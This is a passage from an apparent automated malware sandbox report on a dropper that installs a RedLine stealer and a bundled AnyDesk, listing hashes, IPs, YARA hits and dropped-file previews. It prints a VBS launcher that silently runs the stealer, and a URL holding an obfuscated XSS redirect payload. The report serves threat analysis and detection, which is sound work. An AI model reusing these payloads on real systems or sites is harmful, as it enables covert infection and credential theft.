                                                                                                                                                                                                                            • 67.203.3.46
                                                                                                                                                                                                                            oZasOwbAre.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 185.195.214.9
                                                                                                                                                                                                                            cCYqRor5yC.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                            • 67.207.161.208
                                                                                                                                                                                                                            LIMESTONENETWORKSUSSecuriteInfo.com.Program.Unwanted.5176.1954.19726.exeGet hashmaliciousHawkEye, PureLog Stealer, XmrigBrowse
                                                                                                                                                                                                                            • 64.31.10.46
                                                                                                                                                                                                                            SecuriteInfo.com.Program.Unwanted.5176.1954.19726.exeGet hashmaliciousHawkEye, Gocoder, PureLog Stealer, XmrigBrowse
                                                                                                                                                                                                                            • 64.31.10.46
                                                                                                                                                                                                                            D7iI17d3sE.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                            • 64.31.53.155
                                                                                                                                                                                                                            thDGuavXoD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 192.169.92.236
                                                                                                                                                                                                                            http://cdn1.filmnewscd.xyzGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 64.31.37.217
                                                                                                                                                                                                                            ZDKv0w0UwA.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 69.162.86.89
                                                                                                                                                                                                                            https://k-e-v.no/?s=%22%2F%3C%2Fscript%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%27%5D%28%5B%27h%27%2C%27t%27%2C%27t%27%2C%27p%27%2C%27s%27%2C%27%3A%27%2C%27%2F%27%2C%27%2F%27%2C%27w%27%2C%27w%27%2C%27w%27%2C%27.%27%2C%27w%27%2C%27h%27%2C%27t%27%2C%27e%27%2C%27n%27%2C%27v%27%2C%27l%27%2C%27p%27%2C%27e%27%2C%27.%27%2C%27c%27%2C%27o%27%2C%27m%27%2C%27%2F%27%2C%27a%27%2C%27c%27%2C%27T%27%2C%27c%27%2C%27l%27%2C%272%27%2C%27k%27%2C%27T%27%2C%27m%27%2C%27P%27%2C%27S%27%2C%27J%27%2C%27i%27%2C%27_%27%2C%27L%27%2C%27d%27%2C%27_%27%2C%27m%27%2C%27h%27%2C%27p%27%2C%27L%27%2C%27w%27%2C%27y%27%2C%27Z%27%2C%27e%27%2C%27d%27%2C%27s%27%2C%27u%27%2C%27P%27%2C%27V%27%2C%27d%27%2C%275%27%2C%275%27%2C%27q%27%2C%27f%27%2C%27t%27%2C%27s%27%2C%272%27%2C%27r%27%2C%27Y%27%2C%27e%27%2C%27_%27%2C%27S%27%2C%27b%27%2C%27Q%27%2C%27X%27%2C%271%27%2C%27b%27%2C%27Z%27%2C%27F%27%2C%27Q%27%2C%27T%27%2C%27N%27%2C%27z%27%2C%27T%27%2C%271%27%2C%27A%27%2C%27s%27%2C%27c%27%2C%27d%27%2C%27I%27%2C%27I%27%2C%27X%27%2C%27G%27%2C%27w%27%2C%27i%27%2C%27c%27%2C%27D%27%2C%27t%27%2C%27e%27%2C%27y%27%2C%27V%27%2C%27V%27%2C%278%27%2C%27v%27%2C%27Z%27%2C%27E%27%2C%27f%27%2C%27f%27%2C%27Y%27%2C%27C%27%2C%27e%27%2C%27o%27%2C%27Y%27%2C%27X%27%2C%27g%27%2C%27~%27%2C%27~%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3EGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.115.232.150
                                                                                                                                                                                                                            http://discord.cc/meuserdd8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 74.63.219.251
                                                                                                                                                                                                                            http://discord.cc/meuserdd8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 74.63.219.251
                                                                                                                                                                                                                            http://www.hermesjms.com/confluence/display/HJMS/InstallingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 69.162.95.6

                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            c91bde19008eefabce276152ccd51457AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            http://sub.nabprotect-livechat.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://nab-support.com/LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://bendigo-desk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://bendigo-desk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            Project.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44
                                                                                                                                                                                                                            https://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 64.31.23.26
                                                                                                                                                                                                                            • 185.229.191.44

                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            C:\ProgramData\WinNet\gcapi.dllhttps://download.anydesk.com/AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              https://nab-support.com/LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                Project.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    LiveChat.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        AnyDesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          anydesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            anydesk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              AnyDesk.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                C:\ProgramData\WinNet\AnyDesk.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\embedded.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5216584
                                                                                                                                                                                                                                                Entropy (8bit):7.999460832435841
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:98304:NzTZ3cINQscs0m++LNkT6OpwDGUUH57yvZ/49Mr8EO3QhA9Kq:Nzt3cINQscNmvLCwDkHEvZ/4R79x
                                                                                                                                                                                                                                                MD5:A21768190F3B9FEAE33AAEF660CB7A83
                                                                                                                                                                                                                                                SHA1:24780657328783EF50AE0964B23288E68841A421
                                                                                                                                                                                                                                                SHA-256:55E4CE3FE726043070ECD7DE5A74B2459EA8BED19EF2A36CE7884B2AB0863047
                                                                                                                                                                                                                                                SHA-512:CA6DA822072CB0D3797221E578780B19C8953E4207729A002A64A00CED134059C0ED21B02572C43924E4BA3930C0E88CD2CDB309259E3D0DCFB0C282F1832D62
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q.hU0.;U0.;U0.;:F#;V0.;:F";]0.;:F.;T0.;:F.;T0.;RichU0.;................PE..L....E.e.........."......*....O...#.S6.......@....@..........................ps.......O...@...........................................s.PH...........HO.HQ...`s......0$..............................................................................text...w(.......*.................. ..`.itext....#..@...........................rdata.......0$.....................@..@.data.....N..@$...N..2..............@....rsrc...PH....s..J....N.............@..@.reloc.......`s......DO.............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\WinNet\embedded.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):12371456
                                                                                                                                                                                                                                                Entropy (8bit):6.778870362417023
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:kj1ZAxOCU3yUetDvB6ti3FOU8jRdqY9d2omTt20+NIZ:YAxOCU3yUetDvB6ti1aOTtlcIZ
                                                                                                                                                                                                                                                MD5:DB408CB75C1D0DA769C19A6CBBE60D87
                                                                                                                                                                                                                                                SHA1:76C93E7B38C9B1E17A3506B7527B3EFC4BAF76F5
                                                                                                                                                                                                                                                SHA-256:703D8767AEBE2DAEEA5525DA247CE23775F542C0621DF75CE436B95AAF21CE26
                                                                                                                                                                                                                                                SHA-512:8887125B1DE8969C8FFF3D601553400FA1DFE91E042DF7FB56A9074472839226E2B08289C70E2DA31C813CB8A1DEE59950B3DBDE9812131228A035525E652D84
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\ProgramData\WinNet\embedded.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a(J(%I${%I${%I${.9'z=I${.9!z.I${C&.{,I${w<!zvI${w< z6I${w<'z)I${.9 z.I${.9%z>I${%I%{)H${%I${AM${.<$z$I${.<.{$I${.<&z$I${Rich%I${........PE..d......e..........".......)..........4&........@.....................................y....`...........................................9..&....:......p<.......;..G............=......9.T.....................9.(...p.9.8.............)..............................text...4.).......)................. ..`.rdata...P....)..R....).............@..@.data........@:..B...&:.............@....pdata...G....;..H...h:.............@..@_RDATA.......`<.......;.............@..@.rsrc........p<.......;.............@..@.reloc.......=.......<.............@..Bsnapshot.d...0>..f...`=.........................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\WinNet\gcapi.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):394240
                                                                                                                                                                                                                                                Entropy (8bit):6.700175464943679
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:Tv/ioKdMF+LZD/ZRj1vwWrrUFMNoz4pFGxjEB1NYAOrabN2GZvFcD7:Td+LZrNwWrrwMNoz4vG1OYZabtK7
                                                                                                                                                                                                                                                MD5:1CE7D5A1566C8C449D0F6772A8C27900
                                                                                                                                                                                                                                                SHA1:60854185F6338E1BFC7497FD41AA44C5C00D8F85
                                                                                                                                                                                                                                                SHA-256:73170761D6776C0DEBACFBBC61B6988CB8270A20174BF5C049768A264BB8FFAF
                                                                                                                                                                                                                                                SHA-512:7E3411BE8614170AE91DB1626C452997DC6DB663D79130872A124AF982EE1D457CEFBA00ABD7F5269ADCE3052403BE31238AECC3934C7379D224CB792D519753
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Project.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: LiveChat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: LiveChat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: anydesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: anydesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........q.hB..;B..;B..;.I.:@..;...;W..;...;...;...;b..;.#;@..;!M.:U..;!M.:c..;!M.:u..;...;@..;,M.:...;...;Y..;B..;~..;,M.:e..;,M.:C..;,M.;C..;B.s;C..;,M.:C..;RichB..;........................PE..L......W.........."!................:.....................................................@.........................p................0.......................@..h2......8...........................p...@.......................@....................text...y........................... ..`.rdata...-..........................@..@.data...H5..........................@....gfids..(...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc..h2...@...4..................@..B................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\WinNet\gg.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):304128
                                                                                                                                                                                                                                                Entropy (8bit):5.030148501932413
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:lqFFrqwIOGEzyJNmWb7cGaXSf0vdSP/HqlYuJTZFfuIMcZqf7D34teqiOLCbBOj:sBIOGFiifzHqlpJTZhWcZqf7DIXL
                                                                                                                                                                                                                                                MD5:20AB063F206EB8115FDE1479E05C245E
                                                                                                                                                                                                                                                SHA1:2088F3C51A5AD9E11DA999A7114623274CC69692
                                                                                                                                                                                                                                                SHA-256:5EC4818DA47F24AC8762BF73D0395662639142F86B930DB138E586C2EB91B29E
                                                                                                                                                                                                                                                SHA-512:2DC3181D57EE616C1BB5860D0007D06C04BA1A693064FE7044D9F07939E99E54E8B2864EBBB7268118784A691037DAD6756532BD149C74AEEDC993D0D0E4A0C5
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\ProgramData\WinNet\gg.exe, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ........@.. ....................................@.................................|...O...................................`................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\WinNet\p.vbs

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):170
                                                                                                                                                                                                                                                Entropy (8bit):4.9082518346015584
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Zy0c74Wuj0c74Wm+m8nmKGc74WDQIUqF4R51GREfL4lDFnqJXRPc74WmTC:Zdc74Wpc74WCqXGc74WD/Uq88RqTPc7P
                                                                                                                                                                                                                                                MD5:3BA4CEBB444685D48F8B0DFD67C8390D
                                                                                                                                                                                                                                                SHA1:8B84E1821C39EC8658E603E498B07E08DDA2E6D1
                                                                                                                                                                                                                                                SHA-256:7F2BB84F63B47F35EE7EB70A35D35B81B63A7BCD39029CFB918FB6839F45A70C
                                                                                                                                                                                                                                                SHA-512:42B8271CD6343F7D75F4D5398370ED7D614C2250EA43531A9F19E80E5F0A339F6CC5EC565326CC6911B33BF872CEF9B860D72D8887573D92D5C7661C580A232E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:Dim WinScriptHost.Set WinScriptHost = CreateObject("WScript.Shell").WinScriptHost.Run Chr(34) & "C:\\ProgramData\\WinNet\\gg.exe" & Chr(34), 0.Set WinScriptHost = Nothing

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gg.exe.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3094
                                                                                                                                                                                                                                                Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                                MD5:2A56468A7C0F324A42EA599BF0511FAF
                                                                                                                                                                                                                                                SHA1:404B343A86EDEDF5B908D7359EB8AA957D1D4333
                                                                                                                                                                                                                                                SHA-256:6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
                                                                                                                                                                                                                                                SHA-512:19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\gcapi.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):394240
                                                                                                                                                                                                                                                Entropy (8bit):6.700175464943679
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:Tv/ioKdMF+LZD/ZRj1vwWrrUFMNoz4pFGxjEB1NYAOrabN2GZvFcD7:Td+LZrNwWrrwMNoz4vG1OYZabtK7
                                                                                                                                                                                                                                                MD5:1CE7D5A1566C8C449D0F6772A8C27900
                                                                                                                                                                                                                                                SHA1:60854185F6338E1BFC7497FD41AA44C5C00D8F85
                                                                                                                                                                                                                                                SHA-256:73170761D6776C0DEBACFBBC61B6988CB8270A20174BF5C049768A264BB8FFAF
                                                                                                                                                                                                                                                SHA-512:7E3411BE8614170AE91DB1626C452997DC6DB663D79130872A124AF982EE1D457CEFBA00ABD7F5269ADCE3052403BE31238AECC3934C7379D224CB792D519753
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........q.hB..;B..;B..;.I.:@..;...;W..;...;...;...;b..;.#;@..;!M.:U..;!M.:c..;!M.:u..;...;@..;,M.:...;...;Y..;B..;~..;,M.:e..;,M.:C..;,M.;C..;B.s;C..;,M.:C..;RichB..;........................PE..L......W.........."!................:.....................................................@.........................p................0.......................@..h2......8...........................p...@.......................@....................text...y........................... ..`.rdata...-..........................@..@.data...H5..........................@....gfids..(...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc..h2...@...4..................@..B................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\ad.trace

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):30363
                                                                                                                                                                                                                                                Entropy (8bit):4.398900832719306
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:22mXHoYQzGtuZagRNV3625ProWV4Cg42cj:MXwb3T1uli
                                                                                                                                                                                                                                                MD5:1BAA2AB51B0FEDE34B655F39194B2103
                                                                                                                                                                                                                                                SHA1:329AD2EBE3450B63E12E720EE1A494AF47927733
                                                                                                                                                                                                                                                SHA-256:311E56D700DE167645000355BDD8C4A04BC9589022C8B4748C055503A23D7204
                                                                                                                                                                                                                                                SHA-512:0917317A0106E2C17BCCA76C7CEE9568800C74EC37CD15F8A1174C0CF9A48CBA91A9243E1C130FD098302E34ECED2A4403A4F2456202AA0969BB92A2A2297608
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview: * * * * * * * * * * * * * * * * * *.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * AnyDesk Windows Startup *.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Version 8.0.8 ((detached head) 161cbc3269fd82431aba292c6ced1f1480f4964c).. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Checksum 48544a05569c2af380b61b4f5af5a087.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Build 20240127190435.. info 2024-03-03 12:31:59.038 front 6256 6424 main - * Copyright (C) 2024 AnyDesk Software GmbH *.. info 2024-03-03 12:31:59.038 front 6256 6424 main - .. info 2024-03-03 12:31:59.038 front 6256 6424 main - Command Line params: C:\ProgramData\WinNet\AnyDesk.exe.. i

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\service.conf

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1747)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2966
                                                                                                                                                                                                                                                Entropy (8bit):6.037942663803228
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uISTAXYiD8U5Qtzfd/aP5vTbsNj2UgdhCRd/EQxD090BuAIEVJ/9fXzs0cp5Nr4B:uISTAIigbzfZaP5vTMEHCRRzDpbDs0Gs
                                                                                                                                                                                                                                                MD5:8BECE1F1429437E3BE836B3B4B76CBD4
                                                                                                                                                                                                                                                SHA1:BBA4554164EC750CD4F59D405DB72C09DD3522F0
                                                                                                                                                                                                                                                SHA-256:665836DD08279CFAB3D21545B49A2B3E5BBC56C02BB60E0E65D52DCF3AE0B1A3
                                                                                                                                                                                                                                                SHA-512:6C4BCF8A7F91649B0D7229929DB90235820AEECBDC6511D2B1B697D9E645404069FB3D72D5D998FDF1DF9A1056D7119E54F1EA86C57D3B0E4DD05A2D8CD5ACED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:ad.anynet.cert=-----BEGIN CERTIFICATE-----\nMIICqDCCAZACAQEwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UEAwwOQW55RGVzayBD\nbGllbnQwIBcNMjQwMzAzMTIzMjAyWhgPMjA3NDAyMTkxMjMyMDJaMBkxFzAVBgNV\nBAMMDkFueURlc2sgQ2xpZW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC\nAQEAyr8uRNVprHuc7SYJ2NS3cbEfjFzfL0tdLg7Eu+KjDgEk00GYhJZmxQ92MaKn\nU60HAyHpGj0VfUQXkSwqKpfLJuA0QNSCTYHTwI0p+64xgGh//sZQ0Dm3dAzezp3x\nUyJ0u3YJPEAqOIuaQo0po8gqO4bf5HV2rqzwV+uLeDSUnyDz0GA5Rxf4xZ9DYmHX\nfv5o0s9azBT0mFPZ3FaLQZv0QxtQ4YAh68Gf6To7ucnsfNP8kew2mra35IwuYox9\nGkdZiOyzqNPasQSfUovh36FVmmmqi2RMbMtltkN+ARh80EC2+yvr/6CR4zaA/Rnz\nVvLuinEGjZJjYj6VQQo6SIsb1QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQAAwW6+\nLwFG44DJoP+NDcfyml5UgrkCum303bG2uKzt3GllJpUB6dZ3RBRqF85T8hODBZf6\nImq81pKKAyBJnRd+AuspXam95NZVhSSJbipHB4I1lPXWL3aIznulwT1qQ20DwaR4\n4QKn8UZ9VRcs5SjwumGDNyOxkR1n3OEeGTZcq9g86WhnIU0w1c52yvzT2enuX+9I\nTTnyjUN7zoFcHiIeZxXHX//hs0aRntZjufzmyY3wogt0dg3b3e3DcTSNSLGHggW+\njPtIAquZkvd9Csxu8r1MzdC6onGN7W3L7BEhh/f8wBwmm4CO7ypSMPsFa4byJ4Gl\ndklhjt60B+ipqx14\n-----END CERTI

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\system.conf

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):802
                                                                                                                                                                                                                                                Entropy (8bit):4.791365934579171
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:og0Z+xVAIi+m5sQx0R+iBs7sdi7lNqQHvWhQ44LroBGgFBG9LhhwOMcn:FJ+xo+iBsB5sAw34LtB9LhhwOMc
                                                                                                                                                                                                                                                MD5:1E4E1C0B6A4973A6E7F698C771A857A4
                                                                                                                                                                                                                                                SHA1:1E22F345695F7225F01EA3AC48E833086C73262F
                                                                                                                                                                                                                                                SHA-256:884E4669ED02A87F3E2D2EA464F7A4C70177775D0A7657C60383934903602446
                                                                                                                                                                                                                                                SHA-512:E8B3A794A11BF990EBFB633C39BCA4AC5759CA70F09A0F1AD32EDAAB8BE55C641D595BE927EA2A02E42D6BF3E235FB6F0684255023AA4F1EB0FE2978D0B04751
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:ad.anynet.alias=.ad.anynet.client_stats_hash=5b0dbc4ca0c9e3f20d4241ebe48432d8871b3ab8.ad.anynet.cur_version=34359738376.ad.anynet.fpr=d78d81a2777faf1ddc8912c113f6edad0ae211e6.ad.anynet.id=1244526401.ad.anynet.last_relay=relay-6a630189.net.anydesk.com:80:443:6568.ad.anynet.network_hash=2038af04831d5c3d6443e0de15a3df48f2c757b0.ad.anynet.network_id=main.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=2.ad.license.name=free-1.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles.version=1.ad.security.update_version=1.ad.wol.mac_hash=47dcfed10c8d0ae02cf11ad2a06fa0e5224153e3.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3261)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7120
                                                                                                                                                                                                                                                Entropy (8bit):4.420049102935799
